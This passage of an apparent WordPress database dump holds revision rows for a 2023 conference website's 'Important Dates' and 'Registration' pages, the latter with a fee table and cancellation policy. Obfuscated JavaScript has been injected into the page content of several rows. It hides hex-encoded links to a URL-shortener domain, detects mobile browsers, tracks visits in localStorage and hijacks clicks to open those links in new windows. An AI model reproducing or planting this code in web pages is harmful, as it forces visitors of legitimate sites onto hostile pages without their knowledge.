)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-02-04 07:31:27','2023-02-04 07:31:27','',2654,'https://gsw2023.com/?p=3773',0,'revision','',0),
(3774,1,'2023-02-05 05:57:36','2023-02-05 05:57:36','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 12pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; color: black;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong><span style=\"font-size: 14pt;\">Standard and student / senior (over 65) registration fees include:</span></strong></h5>\n<ul class=\"nospace\">\n<li><span style=\"font-size: 12pt;\"><strong>Entry to all sessions/workshops;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to the Exhibition;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Copy of Final Programme;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Lunches;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong> Accompanying person fee includes:</strong></span></h5>\n<ul>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to Opening Session;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">Cancellation policy:</h5>\n<ul>\n<li><strong><span style=\"font-size: 12pt;\">Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</span></strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"><strong>-Two Social Dinners Will Be Organized On Tuesday And Thursday.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 05:57:36','2023-02-05 05:57:36','',2638,'https://gsw2023.com/?p=3774',0,'revision','',0),
(3775,1,'2023-02-05 08:11:23','2023-02-05 08:11:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 12pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: \'Andale Mono\', Times;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; color: black;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One 